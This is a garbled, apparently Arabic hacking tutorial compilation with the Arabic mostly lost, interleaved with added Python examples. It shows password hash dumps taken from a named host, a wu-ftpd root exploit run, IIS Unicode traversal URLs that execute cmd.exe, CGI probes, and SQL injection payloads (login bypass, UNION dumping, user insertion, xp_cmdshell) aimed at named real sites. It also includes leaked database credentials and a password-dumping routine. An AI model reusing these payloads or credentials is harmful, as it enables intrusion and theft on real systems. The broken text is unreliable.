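    """Wordlist mode: cost is len(words) * rules, independent of password length."""
    for word in words:
        for cand in mangle(word):
            if hash_fn(cand, salt) == target:
                return cand
    return None


def brute_force(target: str, salt: str, alphabet: str = string.ascii_lowercase,
                max_len: int = 4, hash_fn: HashFn = toy_hash) -> Optional[str]:
    """Incremental mode: every string over `alphabet` up to max_len; cost |alphabet|**len."""
    for n in range(1, max_len + 1):
        for tup in itertools.product(alphabet, repeat=n):
            cand = "".join(tup)
            if hash_fn(cand, salt) == target:
                return cand
    return None


def search_space(alphabet_size: int, max_len: int) -> int:
    """Number of candidates brute force must try in the worst case."""
    return sum(alphabet_size ** n for n in range(1, max_len + 1))


WORDLIST = ["password", "song", "secret", "admin"]  # constructed sample
```

search_space(26, 8) is already over 200 billion, which is why the text's advice to try the wordlist first and fall back to `john -i` only afterwards still holds.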
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~
~
Unshadow !!
) ( shadow file
.
:
root:EpGw4GekZ1B9U:11390::::::
bin:NP:6445::::::
sys:NP:6445::::::
adm:IyEDQ6VoRlLHM:10935::::::
#admin:9z8VMm6Ovcvsc:10935::::::
lp:NP:6445::::::
----------------------------------------------------------------------------------------------
passwd
shadow passwd file
...
http://wilsonweb2.hwwilson.com/etc/passwd
----------------------------------------------------------------------------------------------
root:x:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
smtp:x:0:0:Mail Daemon User:/:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:Nobody:/:
noaccess:x:60002:60002:No Access User:/:
nobody4:x:65534:65534:SunOS 4.x Nobody:/:
www:x:102:1001::/web:/bin/csh
mirrors:x:102:1001::/web/mirrors:/web/mirrors/menu
sid:x:103:10::/export/home/sid:/bin/ksh
mirror:x:104:1::/home/mirror:/bin/sh
admin:x:105:1::/home/admin:/bin/sh
jerome:x:106:1::/home/jerome:/bin/sh
erl:x:102:1::/home/erl:/bin/sh
landmark:x:1000:1000::/web/landmark:/bin/ksh
----------------------------------------------------------------------------------------------
x token
etc/shadow/
http://wilsonweb2.hwwilson.com/etc/shadow
----------------------------------------------------------------------------------------------
root:XOT4AiUKMRcKQ:10643::::::
daemon:NP:6445::::::
bin:NP:6445::::::
sys:NP:6445::::::
adm:NP:6445::::::
lp:NP:6445::::::
smtp:NP:6445::::::
uucp:NP:6445::::::
nuucp:NP:6445::::::
listen:*LK*:::::::
nobody:NP:6445::::::
noaccess:NP:6445::::::
nobody4:NP:6445::::::
www:WJctaI.8rcSe2:10507::::::
mirrors:gg9p.5kwGw1MY:10911::::::
sid:stXldZKnujFYo:10515::::::
mirror:iMPWwbrU.gB4k:10601::::::
admin:hDhB5YYKyWgQw:10976::::::
jerome:XDqnOl32tPoGo:10976::::::
erl:0jE9Xem4aJYeI:10982::::::
landmark:0jCgWu6vl8g0s:11185::::::
----------------------------------------------------------------------------------------------
x
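An added example, not from the original text: a small Python audit that re-joins the /etc/passwd and /etc/shadow dumps above the way unshadow does and flags what a reviewer looks at first. The two samples are trimmed copies of the dumps on this page (note that the dump really does list smtp with UID 0); the lock-token list and the checks are this example's own assumptions.

```python
# Added example: re-join the /etc/passwd and /etc/shadow dumps quoted in the
# text (unshadow-style) and flag accounts worth a second look.
# Samples are trimmed copies of the dumps above; nothing is read from disk.
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

PASSWD_SAMPLE = """\
root:x:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/:
smtp:x:0:0:Mail Daemon User:/:
listen:x:37:4:Network Admin:/usr/net/nls:
www:x:102:1001::/web:/bin/csh
mirrors:x:102:1001::/web/mirrors:/web/mirrors/menu
admin:x:105:1::/home/admin:/bin/sh
"""

SHADOW_SAMPLE = """\
root:XOT4AiUKMRcKQ:10643::::::
daemon:NP:6445::::::
smtp:NP:6445::::::
listen:*LK*:::::::
www:WJctaI.8rcSe2:10507::::::
mirrors:gg9p.5kwGw1MY:10911::::::
admin:hDhB5YYKyWgQw:10976::::::
"""

# Assumed set of "no password / locked" markers: Solaris NP and *LK*, the
# common * and ! forms, and the x placeholder itself.
LOCK_TOKENS = {"NP", "*LK*", "*", "!", "!!", "x"}


@dataclass
class Account:
    name: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str
    hash: Optional[str] = None  # filled in from shadow; None if no shadow line


def parse_passwd(text: str) -> Dict[str, Account]:
    accounts = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        name, _pw, uid, gid, gecos, home, shell = line.split(":", 6)
        accounts[name] = Account(name, int(uid), int(gid), gecos, home, shell)
    return accounts


def parse_shadow(text: str) -> Dict[str, str]:
    hashes = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        name, hash_, _rest = line.split(":", 2)
        hashes[name] = hash_
    return hashes


def unshadow(passwd_text: str, shadow_text: str) -> Dict[str, Account]:
    """Put each shadow hash back into the account record, as unshadow(8) does."""
    accounts = parse_passwd(passwd_text)
    hashes = parse_shadow(shadow_text)
    for acct in accounts.values():
        acct.hash = hashes.get(acct.name)
    return accounts


def is_crackable(acct: Account) -> bool:
    """True when field 2 holds a real hash rather than a lock marker."""
    h = acct.hash
    return h is not None and h not in LOCK_TOKENS and not h.startswith(("!", "*"))


def audit(accounts: Dict[str, Account]) -> List[Tuple[str, str]]:
    findings = []
    for acct in accounts.values():
        if acct.uid == 0 and acct.name != "root":
            findings.append((acct.name, "uid 0 account other than root"))
        if acct.hash == "":
            findings.append((acct.name, "empty password field"))
        if is_crackable(acct) and len(acct.hash) == 13:
            findings.append((acct.name, "13-char traditional DES hash: 8 significant chars, fast to crack"))
    return findings
```

Only the four accounts with a real 13-character hash are worth feeding to a cracker; NP and *LK* entries can never match, whatever the wordlist.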
-:
...
-:
www.securiteam.com/exploits/archive.html
/http://www.ussrback.com
+
/http://www.secureroot.com
/http://www.rootshell.com
/http://www.ussrback.com
www.secureroot.com/category/exploits
www.hitboss.com/Hacking
www.undergroundnews.com/resour
ces/s...ound/search.asp
Warez.com-Underground
/http://www.warez.com
Hacking
((
/http://www.neworder.box.sk
" ) ( "
> <
...
..
.....
....
* ) (host
* )
(passwd
/etc/passwd
shadow
passwd
dev
lib .
tmp
usr
.
. nt
nt.
admin.pwd
*
cgi-
bin cgi
php.cgi
/http://www.jewish.org
/http://www.jewish.org /cgi-bin
php.cgi
http://www.jewish.org/cgi-bin/php.cgi
scripts
http://www.jewish.org/scripts/php.cgi
scripts winnt
cgi-bin
" )( "
><
>< ICER :
: ...
)(
...
(:
.
: *
(a) Linux (http://www.slackware.com/)
(b) Nmap (http://www.insecure.org/)
(c) NetCat (http://www.l0pht.com/~weld/netcat/)
-:
) -1
( P:
: nmap -2
(1) tar zxvf nmap.tar.gz
(2) cd nmap
(3) ./configure && make && make install
.. -3
www.target.com
. -4
nslookup www.target.com
196.1.2.3
-5
-: .
"nmap -sS -O 196.1.2.3"
-: .
root@IcEr:~# nmap -sS -O 196.1.2.3
Starting nmap V. 2.54BETA22 ( www.insecure.org/nmap/ )
Interesting ports on www.target.com (196.1.2.3):
(The 1531 ports scanned but not shown below are in state: closed)
Port       State       Service
21/tcp     open        ftp
25/tcp     open        smtp
80/tcp     open        http
111/tcp    open        sunrpc
113/tcp    open        auth
515/tcp    open        printer
(: .
...
.
FTP ..
daemon
FTP daemon
-:
"telnet 196.1.2.3 21"
"ftp 196.1.2.3"
:
root@IcEr:~# ftp 196.1.2.3
Connected to 196.1.2.3.
220 www.target.com FTP server (Version wu-2.6.0(1) Mon Mar 6 13:54:16 SAST 2000) ready.
Name (target:root): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
.
.wu-2.6.0
anonymous ;(
####### #######
7 8 -:
.FTPd
) (
wuftpd2600.c
. red hat
6.2
. .
root access
;(-
root@IcEr:~/# ./wuftpd2600 -t -s 0 196.1.2.3
..
man gcc
..
(:
search..U will find what U wanna
... ..
.. ..
anonymous
..
.. .
..
..
. ..
.. .
|
|
| *
| index
| * /
|
|
| *
| * .htpasswd
|
|
| * htaccess.
| * htaccess.
|
|
| *
|
| *
-------------------------------------------------*
-----------
,
.. . htaccess.
.
* htaccess.
---------------------- -1
-2 error
-3
index
-4/
-5 html ,.
.. .asp
-6
* htaccess.
--------------------------
" "Notepad
htacces.
txt. ,
" - "htaccess.
. -
* error
-----------------------
.
.
error
-:
- error
-
- htaccess.
ErrorDocument error_num directory_file
. " error_num
directory_file "
error
.
:
ErrorDocument 404 /errors/nfound.html
- : errors
----------------------
| 400 | Bad Syntax   |
| 401 | Unauthorized |
| 402 | Not Used     |
| 403 | Forbidden    |
| 404 | Not Found    |
----------------------
*
index
----------------------------------------------
index.
-:
- index "
"
-. htaccess.
-:
Options -Indexes
* /
------------------------------------ . htaccess.
..
- :
???deny from ???.???.???.
... .
-:
deny from all
-:
... allow from
...
*
------------------------------------585
Redirection
htaccess. .
. .
htaccess
-:
???Redirect/???.
???/somewhere/???.
http://www.site.com/newlocation
???.???/somewhere/
??/http://www.site.com/newlocation
? ???.
.
---------* .htpasswd
------------------------
. htaccess.
, . .
htaccess
htpasswd
-:
user1:EncryptedPwd1
user2:EncryptedPwd2
o user1 , user2 . .
o EncryptedPwd1 ,
EncryptedPwd2
http://www.euronet.nl/~arnow/htpasswd
http://www.e2.unet.com/htaccess/make.htm
Security
fu93hds3
http://www.euronet.nl/~arnow/htpasswd
o username : Security
o passwrod & re-enter password :
fu93hds3
o claculate
Security:893bNicBcwszw <- htaccess.
. .
htaccess
.
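The user:hash line shown above, as an added example that is not part of the original text: generating and verifying .htpasswd entries from Python. It uses Apache's unsalted {SHA} format (what `htpasswd -s` writes) so that only the standard library is needed; the 893bNicBcwszw value quoted above is traditional crypt(3), a different format Apache also accepts but one limited to eight significant password characters. Prefer bcrypt (`htpasswd -B`) on any current server. The user name and password are the ones from the text; the second sample user is constructed.

```python
# Added example: produce and check .htpasswd lines in Apache's {SHA} format.
# Not the page's own code; the second user below is a constructed sample.
import base64
import hashlib
import hmac
from typing import Dict


def sha_entry(user: str, password: str) -> str:
    """user:{SHA}base64(sha1(password)) -- what `htpasswd -nbs user pw` prints."""
    if ":" in user:
        raise ValueError("user name may not contain ':'")
    digest = hashlib.sha1(password.encode("utf-8")).digest()
    return f"{user}:{{SHA}}{base64.b64encode(digest).decode('ascii')}"


def parse_htpasswd(text: str) -> Dict[str, str]:
    """Map user -> stored hash; blank lines and # comments are ignored."""
    users = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        user, _, stored = line.partition(":")
        users[user] = stored
    return users


def check_password(htpasswd_text: str, user: str, password: str) -> bool:
    """Constant-time comparison against the stored {SHA} hash.
    Unknown user, or a hash in another format, is simply a failed login."""
    stored = parse_htpasswd(htpasswd_text).get(user)
    if stored is None or not stored.startswith("{SHA}"):
        return False
    calc = sha_entry(user, password).split(":", 1)[1]
    return hmac.compare_digest(stored, calc)


# Constructed sample file: the text's Security / fu93hds3 pair plus one more user.
HTPASSWD = sha_entry("Security", "fu93hds3") + "\n" + sha_entry("user1", "EncryptedPwd1") + "\n"
```

{SHA} is unsalted, so two users with the same password get the same line and a precomputed table breaks all of them at once; that is the reason to move to bcrypt rather than keep using the 1990s formats this page works with.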
* htaccess.
---------------------------
,
.
htaccess.
.
--:
AuthUserFile /somewhere/.htpasswd
AuthName "Enter your user and passed please"
AuthType Basic
<Limit GET POST>
require valid-user
</Limit>
o /somewhere/.htpasswd
htpasswd.
o Enter your user and passed
please
* htaccess.
----------------------------
,
..
- :
<Files .htaccess>
order allow,deny
deny from all
</Files>
*
------------------------------ .
html. txt. .
-:
AddType text/plain .html
-:
591
http://www.pharaonics.net/books/MIME.txt
Protocol
TCP/IP
FTP .
Formats
. ,FTP
.
. :
:
:Download
Host
.Local
:Uplaod
Local
.Host
:
:Secure FTP
.
. . .
:Anonymous FTP
.
. guest anonymous
.
.:
:Public Domain
. .
.
:Freeware
.
.
:Shareware
.
FTP :
:ASCII
: FTP
:
. . UNIX
.
:UNIX
:ascii ASCII
.
:binary
.
:status
ASCII .Binary
:help .UNIX
:dir
:ls .
:cd directory .
:get filename
.
:mget filename .
:pwd .
:bye . .
. :Shell
Tripod Unix Shell
ftp :
ftp ftp.tripod.com
" "IronPrivate .
"******" .
. Unix.
. Unix
:
http://www.pcworlds.net/lunexx.html
. .
. :Browser
URL
ftp:// http://
FTP
.
. :SLIP/PPP
. .Client Programs
Windows .Ws_ftp
. :Ws_ftp LE 5.06
Session
Profile .
Profile Name
My Home Page In
Tripod Host Name
ftp.tripod.com
Host Type Auto Detect .
.
User ID
IronPrivate
Password .
****** , .OK :
.
...
.
.
.
:Telnet
Telnet
.
. .
. . .
Windows . .
""
.
" "FTP
> <
>< hacker dz :
. .
FTP
.
21
FTP
SuperScan
Start
Run
ftp -n
ftp>
.
Open
Enter
ftp>
To
To
Connected to www.assassin.com
220 websrv1 Microsoft FTP Service (Version 4.0).
20
.
Pwd
Cd
.
Cd black
.
Ls
Get
Get black.exe
Put
Get
Put black.exe
close
.
Codes and their meaning:

110  Restart marker reply.
120  Service ready in nnn minutes. (nnn is a time)
125  Data connection already open; transfer starting.
150  File status okay; about to open data connection.
200  Command okay.
202  Command not implemented, superfluous at this site.
213  File status.
214  Help message.
215  NAME system type.
220  Service ready for new user.
221  Service closing control connection.
225  Data connection open; no transfer in progress.
226  Closing data connection.
227  Entering passive mode (h1,h2,h3,h4,p1,p2).
230  User logged in, proceed.
250  Requested file action okay, completed.
257  "PATHNAME" created.
331  User name okay, need password.
332  Need account for login.
350  Requested file action pending further information.
421  Service not available, closing control connection.
425  Can't open data connection.
426  Connection closed; transfer aborted.
450  Requested file action not taken. (file already in use by something else)
451  Requested action aborted: local error in processing.
452  Requested action not taken. (not enough memory to carry out the action)
500  Syntax error, command unrecognized.
501  Syntax error in parameters or arguments.
502  Command not implemented.
503  Bad sequence of commands.
504  Command not implemented for that parameter.
530  Not logged in.
532  Need account for storing files.
550  Requested action not taken. (file not found, no access possible, ...)
551  Requested action aborted: page type unknown.
552  Requested file action aborted.
553  Requested action not taken. (file name not allowed)
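An added example (not part of the original text) that puts the reply-code table above to use: a Python parser for FTP control-channel replies. It handles the single-line form, the RFC 959 multi-line form ("230-" ... "230 "), classifies a reply by its first digit, and extracts host and port from the 227 Entering Passive Mode reply (port = p1*256 + p2). The sample stream is constructed from the banners quoted in this document plus a made-up multi-line 230.

```python
# Added example: parse FTP control-channel replies per the table above.
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

REPLY_LINE = re.compile(r"^(\d{3})([ -])(.*)$")
PASV_RE = re.compile(r"\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)")
KINDS = {1: "preliminary", 2: "completion", 3: "intermediate",
         4: "transient-failure", 5: "permanent-failure"}


@dataclass
class FtpReply:
    code: int
    lines: List[str]

    @property
    def text(self) -> str:
        return "\n".join(self.lines)

    @property
    def kind(self) -> str:
        """Meaning of the first digit (RFC 959): 1xx preliminary ... 5xx permanent failure."""
        return KINDS.get(self.code // 100, "unknown")


def parse_replies(raw: str) -> List[FtpReply]:
    """Split a server stream into replies; multi-line replies run from 'xyz-' to 'xyz '."""
    replies: List[FtpReply] = []
    open_code: Optional[int] = None
    current: List[str] = []
    for line in raw.replace("\r\n", "\n").split("\n"):
        if not line:
            continue
        m = REPLY_LINE.match(line)
        if open_code is None:
            if not m:
                raise ValueError(f"not a reply line: {line!r}")
            code, sep, text = int(m.group(1)), m.group(2), m.group(3)
            if sep == "-":
                open_code, current = code, [text]
            else:
                replies.append(FtpReply(code, [text]))
        elif m and int(m.group(1)) == open_code and m.group(2) == " ":
            current.append(m.group(3))
            replies.append(FtpReply(open_code, current))
            open_code, current = None, []
        else:
            current.append(line)   # continuation line inside a multi-line reply
    if open_code is not None:
        raise ValueError("unterminated multi-line reply")
    return replies


def pasv_endpoint(reply: FtpReply) -> Optional[Tuple[str, int]]:
    """227 -> (host, port) with port = p1*256 + p2; None for any other reply."""
    if reply.code != 227:
        return None
    m = PASV_RE.search(reply.text)
    if not m:
        return None
    h1, h2, h3, h4, p1, p2 = map(int, m.groups())
    return f"{h1}.{h2}.{h3}.{h4}", p1 * 256 + p2


SAMPLE = (  # constructed from the banners quoted in this document plus a made-up multi-line 230
    "220 www.target.com FTP server (Version wu-2.6.0(1) Mon Mar 6 13:54:16 SAST 2000) ready.\r\n"
    "331 Guest login ok, send your complete e-mail address as password.\r\n"
    "230-Welcome, anonymous user.\r\n"
    "    Disk quota applies.\r\n"
    "230 User logged in, proceed.\r\n"
    "227 Entering Passive Mode (196,1,2,3,4,10).\r\n"
    "530 Not logged in.\r\n"
)
```

The 227 parse is where the PASV data connection the text mentions comes from: the client opens a second TCP connection to the host and port the server names, which is also why a server that announces a private address in 227 breaks through NAT.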
:
SQL
PHP ASP
_LinuxRay
-. - -
. Administrator
...
:
SQL
User Name Passwd
: .
User name
and Passwd ASP
* sql.
htr.+
. :
http://target/page.asp+.htr
: target
: Page asp
: htr.+
.
....
View
ASP Source
:
<%
Set DB = Server.CreateObject("ADODB.Connection")
DB.Open "DRIVER=SQL Server;SERVER=xxx;UID=sa;PWD=;APP=Microsoft (R) Developer Studio;WSID=xxx;DATABASE=moe_dbs", "_LinuxRay", "6666666"
%>
---------------------------------------------------------------_ .
LinuxRay
6666666
----------------------------------------------------------------
ASP :
Microsoft VBScript runtime error '800a01a8'
Object required: 'Conn'
/filename.inc, line 5
* inc.
.
.
ASP
database.inc
<!--#include file="database.inc"-->
global.asa
global.asa++
beforemilion-global.asa
global.asamilion.sql
global-direct.asa
SQL
:
global.asa+.htr
IIS 3
ASP ::$DATA
file.asp::$DATA
IIS 3
.
...
.
!! SQL
.
Visual interdev 6.0
. ACCESS 2000
File
New
(Project (Exiting Data
.
Create
Data Link Properties
-
. -
- 1 Select or
enter server name
- 2 . User Name
- 3 Password
) Blank
(Password
Test Connection
Test Connection Succeeded
.
:
Select the data base on the server
OK .
. ,
PHP ASP
.
SQL Server , MySQL,Oracle
.
.
SQL
.
.
. .
.
. (:
((((:
.
.
SQL
.
.
.
.
.
SQL
.
SQL injection
/http://www.stc.com.sa
http://www.stc.com.sa/arabic/script
s/ar_frame.asp?pagenum=25
.
!!!!
SQL
injection
.
' : .
' :
:
SQL
SQL inject
. Query
.
SQL injection
.
. .
code:
SELECT * FROM Users WHERE User_Name='<field from web form>' AND Password='<field from web form>'

if (TRUE) {
    Login OK
} else {
    Login FAILED
}
.
.
.
. admin :
t0ps3cr3t :
SQL :
code:
SELECT * FROM Users WHERE User_Name='admin' AND Password='t0ps3cr3t'
User
. admin
t0ps3cr3t
. TRUE
. .
FALSE
:
. SQL
> <field from web form
.
' .
SQL :
code:
SELECT * FROM Users WHERE User_Name='' AND Password=''
!!
. . . blah' OR '1'='1 :
.
SQL
code:
SELECT * FROM Users WHERE User_Name='blah' OR '1'='1' AND Password='blah' OR '1'='1'

Users
. .
'blah' OR '1'='1'
OR
'blah'
TRUE
'1'='1'
1 1. !!!!
TRUE OR
TRUE
TRUE
: TRUE
TRUE
. . TRUE
TRUE. SQL injection
.
Users
.....
SQL
WHERE
. (two dashes) --
,
blah' OR '1'='1'--
)
--
SQL .
having clause .
' having 1=1--
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'cs_isp_user.UserID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/Arabic/Scripts/ar_csd_reply.asp, line 33
. group by
' group by cs_isp_user.UserID--
' group by cs_isp_user.UserID,cs_isp_user.passwd--
. !
.
. :
blah' group by (username)--
:
:
username
password .
,username,id,userid,email
first_name,
userid
:
cs_isp_user
passwd
. .
blah' group by (passwd)--
:
:
UserID
userid
MS SQL Server
(:
UserID passwd
. .
.
(:
. . blah' :
INSERT INTO cs_isp_user(UserID,passwd) VALUES('M_3','hi')--
. .
M_3 hi
) (
inject
id
. ) (
user
id
username )
.( admin1
passwd
union
)
(
blah' union SELECT username FROM user
:
id .
blah' union SELECT username,username FROM user
.
blah' union SELECT username,username,username,username,username FROM user
:
.( :
). SQL
(Lame_Admin ) (int
, .
Lame_Admin
(: microsoft
(:
.
blah' union SELECT passwd,passwd,passwd,passwd,passwd FROM user
.
:
.
. .
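The two passages above, the 'blah' OR '1'='1' login bypass and the UNION SELECT column-count probing, as one added Python example that is not code from the original text. It builds the text's Users/User_Name/Password query both ways against an in-memory SQLite database: concatenated as the text shows it, and parameterised as the fix. Table contents, the second user and the column-count probe are constructed; SQLite's error for a column mismatch plays the role of the ODBC error the text relies on.

```python
# Added example: the text's login query built two ways against SQLite.
# Sample users are constructed; column names follow the text's example.
import sqlite3
from typing import List, Optional


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Users (id INTEGER PRIMARY KEY, User_Name TEXT, Password TEXT)")
    db.executemany("INSERT INTO Users (User_Name, Password) VALUES (?, ?)",
                   [("admin", "t0ps3cr3t"), ("jerome", "letmein")])
    return db


def login_vulnerable(db: sqlite3.Connection, user: str, password: str) -> List[str]:
    """String concatenation, the shape the text shows. Returns the matched names."""
    sql = ("SELECT User_Name, id FROM Users WHERE User_Name='" + user
           + "' AND Password='" + password + "'")
    return [row[0] for row in db.execute(sql)]


def login_fixed(db: sqlite3.Connection, user: str, password: str) -> List[str]:
    """Parameterised: values travel separately from the SQL text, so a quote is just data."""
    sql = "SELECT User_Name, id FROM Users WHERE User_Name=? AND Password=?"
    return [row[0] for row in db.execute(sql, (user, password))]


BYPASS = "blah' OR '1'='1"            # AND binds tighter than OR, so the trailing OR '1'='1' wins
BYPASS_COMMENT = "blah' OR '1'='1'--"  # the -- comments the Password clause out entirely


def union_payload(columns: int, table: str, column: str) -> str:
    """blah' UNION SELECT col,col,... FROM table--  padded to the probed column count."""
    cols = ",".join([column] * columns)
    return f"blah' UNION SELECT {cols} FROM {table}--"


def probe_column_count(db: sqlite3.Connection, max_cols: int = 10) -> Optional[int]:
    """Grow the UNION until the database stops complaining about the column count."""
    for n in range(1, max_cols + 1):
        try:
            login_vulnerable(db, union_payload(n, "Users", "Password"), "x")
            return n
        except sqlite3.OperationalError:   # "SELECTs ... do not have the same number of result columns"
            continue
    return None


def dump_passwords(db: sqlite3.Connection) -> List[str]:
    """Use the probed column count to read every Password through the login query."""
    n = probe_column_count(db)
    return login_vulnerable(db, union_payload(n, "Users", "Password"), "x")
```

The parameterised version returns nothing for every payload, and it is not because quotes are stripped: the database receives the query text and the values through separate channels, so no value can ever change the query's structure.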
.
Stored Procedure
Built-
in.
Stored Procedure
SQL Server . sa
. SQL
Server
SQL
Server
Stored Procedure 100
+------------------------+
| xp_cmdshell            |
| xp_regread             |
| xp_regdeletekey        |
| xp_regdeletevalue      |
| xp_regwrite            |
| xp_servicecontrol      |
+------------------------+
Procedure
exec master..xp_cmdshell 'dir'
. xp_cmdshell
exec master..xp_regwrite
asp
asp
CREATE TABLE M_3 (source varchar(8000))
. M_3
varchar
8000
bulk insert M_3 from 'c:\InetPub\wwwroot\login.asp'
union
.
"
"
> . <
>< CONIK :
-:
-:1
-: .
user administrator
.
) (
-:2
-: %99
C
.
shell
PHP
Shell PHP ..
Kernel 2.2.x
.
) C
(
perl
.
linux Redhat 7.3
-:3
-:
./file.pl
----Access Denied .
chmod +x Conik.pl
$ ./Conik.pl
-:4 C
-: .
./Conik.c
Sendmail
.
Root
. Exan nofer
XXX.
SENDMAIL
(-:
.
-:5
-:
-:6 Conik
. C Perl
.
PHP - CGI -
UNICODE - VB - etc
-:7 UNICODE
-: UNICODE
. IIS Microsoft
-: UONICODE
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\
/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
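An added example, not part of the original text, that shows why the %255c and %c0%af forms above got past the IIS traversal filter. The filter decoded the path once and looked for a '..' component; the server then decoded a second time (%255c -> %5c -> '\') or accepted an overlong UTF-8 byte pair (%c0%af -> '/') before building the file path. The Python below models that ordering with the naive check next to the real resolution; the web root is an assumption and the overlong-UTF-8 handling is a deliberate simplification of what IIS accepted.

```python
# Added example: model the decode-then-check ordering behind the IIS
# "%255c" / "%c0%af" traversal URLs. WEBROOT is an assumption; the overlong
# UTF-8 handling is a deliberate simplification of what IIS accepted.
import posixpath
from urllib.parse import unquote_to_bytes

WEBROOT = "/inetpub/wwwroot"   # assumed document root


def _path_only(raw: str) -> str:
    """Drop the query string (the ?/c+dir+c:\\ part carries the command, not the path)."""
    return raw.split("?", 1)[0]


def _decode_overlong(data: bytes) -> bytes:
    """Collapse two-byte overlong encodings (e.g. c0 af) to the ASCII byte they encode."""
    out = bytearray()
    i = 0
    while i < len(data):
        b = data[i]
        if b in (0xC0, 0xC1) and i + 1 < len(data) and 0x80 <= data[i + 1] < 0xC0:
            out.append(((b & 0x1F) << 6) | (data[i + 1] & 0x3F))
            i += 2
        else:
            out.append(b)
            i += 1
    return bytes(out)


def naive_check(raw: str) -> bool:
    """The broken filter: decode once, reject any '..' path component, otherwise allow."""
    once = unquote_to_bytes(_path_only(raw)).replace(b"\\", b"/").decode("latin-1")
    return all(part != ".." for part in once.split("/"))


def resolve(raw: str) -> str:
    """What the file-system layer actually opens: decode twice, fold overlong UTF-8, normalise."""
    data = unquote_to_bytes(unquote_to_bytes(_path_only(raw)))
    data = _decode_overlong(data).replace(b"\\", b"/")
    rel = data.decode("latin-1").lstrip("/")
    return posixpath.normpath(WEBROOT + "/" + rel)


def escapes_root(raw: str) -> bool:
    """True when the resolved path lies outside WEBROOT, whatever naive_check said."""
    real = resolve(raw)
    return not (real == WEBROOT or real.startswith(WEBROOT + "/"))


def safe_check(raw: str) -> bool:
    """The fix: canonicalise completely first, then compare the result against the root."""
    return not escapes_root(raw)
```

The general rule the patch for this bug enforced is the one safe_check implements: never make a security decision on a partially decoded path; decode and canonicalise fully, then compare the final path against the root.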
UONICODE
CGI
/cgi-bin/view-source?../../../../../../../etc/passwd
/cgi-bin/phf
/cgi-bin/wwwboard.pl
/cgi-bin/AT-admin.cgi
/cgi-bin/info2www
/cgi-bin/environ.cgi
"
"
> <
><Black_sNiper :
...
.
...
.
.
. .:
who
rwho
finger
.
.:
username : Black
password : Black2
test
demo
. .:
/etc/passwd
/etc/group
/etc/hosts
/usr/adm/sulog
/usr/adm/loginlog
/usr/adm/errlog
/usr/adm/culog
/usr/mail
/usr/lib/cron/crontabs
/etc/shadow
.: bin
.
)(
)( !!
.:
$ ed passwd
exec login
.!!
.
. !!
. .:
.
)( . ..
.:
$ pwd
.:
$ /usr/admin
. ..
.. :
$ /usr/Black
.!!
. .:
$ ls /usr/Black
. .:
mail
pers
games
bin
.profile
.:
$ cd
$ ls -a
:
:
.profile
$
.:
$ cat letter
letter
.:
$ passwd
!!
..
.:
$ grep phone Black
.
.
.:
$ cp letter letters
.
.:
$ write
. .:
$ who
safadM tty1 april 19 2:30
paul tty2 april 19 2:19
gopher tty3 april 19 2:31
. .
..
.:
$ cat /etc/passwd
root:F943/sys34:0:1:0000:/:
sysadm:k54doPerate:0:0:administration:/usr/admin:/bin/rsh
checkfsys:Locked;:0:0:check file system:/usr/admin:/bin/rsh
.:
Black:chips11,43:34:3:Mr doooom:/usr/Black:
.
..
.:
$ ls /etc/group
root::0:root
adm::2:adm,root
bluebox::70:
!!
. .
. ..
"
"
><
> : <
UNix Usage IN HackinG
.. up to date
(:
: pc ,
servers , supercomputers
BOX
. .
..
... root
, superuser
.....
:
.. . .
.. windows .
. ..
.. ...
:
-1
...
nt . 9x
.. .
..
..
-2 ..
..
...
.. :
-1 ). (
-2 open
source
.. (:
BSD . ..
...
..
..
) SuSe
(
MDK
..
9 7.2
) (
.. .. ...
.. ..
..
.. ... .. ..
.
.. ...
.. (:
..
.. . ...
.. ..
. ..
.
.. . ..
.
.. ..
internal
.. winmodems
.
.. windows . ..
. (:
.. . external
. real or true modems
... acorp ,
u.s. robotics
. serial USB
...
.. isp
. (:
..
:
-1 ..
isp ...
-2
...
-3 ... ..
..
(:
=====< ...
..
======< ======<
...
..
.
:
.
. ..
..
-4 .
gov .mil edu.
.
-5 ..
.
REdirecting
: TCP .
..
TCP\IP
....
... =D
.. .
..
) (
..
<< service
service
daemon or server
.. .
. .. .
=D
..
Port   Daemon     Protocol
21     FTPd       FTP
23     telnetd    Telnet
25     sendmail   SMTP (yes!)
80     apache     HTTP
110    qpop       POP3

The trailing d in ftpd, telnetd, etc. stands for daemon.
:
www.host.net
.
TCP 80
.
GET /index.html HTTP/1.1
..
.
index.html
daemons
...
=<
.
daemons
...
..
... port scaners
..
...
nmap fyodor
!!.. ..
=>
http://members.lycos.co.uk/linuxdude/e3sar/
..
nmap rpm
:
